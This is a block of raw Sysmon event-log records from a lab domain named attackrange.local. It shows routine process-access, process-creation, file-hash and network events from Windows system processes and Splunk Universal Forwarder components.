08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F69A-60EB-AF79-00000000D001}1436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F69A-60EB-AF79-00000000D001}1436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.918{0C1E0330-F69A-60EB-AF79-00000000D001}1436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.915{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F91A4437C6BF0FFA6F399D3C4B1EBC9,SHA256=0C14CF0FBAC780A64DD148F427BC27DF159F4B6BFE05A4F05524A4429854B6E0,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.915{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CE07D3D07248F27564C05BF4FA0DD83,SHA256=C220CDE339505C39CF2266D11F5DEBD942FBB8CEDED31F578A5799E315E11D8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:18.587{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51146-false10.0.1.12-8000- 23542300x80000000000000001052039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:26.021{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7499C701D7035F51B43F5323DADA55A9,SHA256=E964B8C1FB04FA7CEDD32966C37114EA0AEC975C8B6F1354C62CA88D39DD2075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F69A-60EB-AE79-00000000D001}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F69A-60EB-AE79-00000000D001}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.400{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F69A-60EB-AE79-00000000D001}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.400{0C1E0330-F69A-60EB-AE79-00000000D001}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:27.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=617F1D9416016F1219524314389FA147,SHA256=827074A42A33476A7C27902AAFB3E8A572023501B316219B7F493D2E16AE90B2,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.931{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A1DDD98656416986977B83C6C09C657,SHA256=676B5BCAFCDB15E357967EE5BC625FBB6CF350EF2AEC421CB8E3E48A79A7FCBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F69B-60EB-B079-00000000D001}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
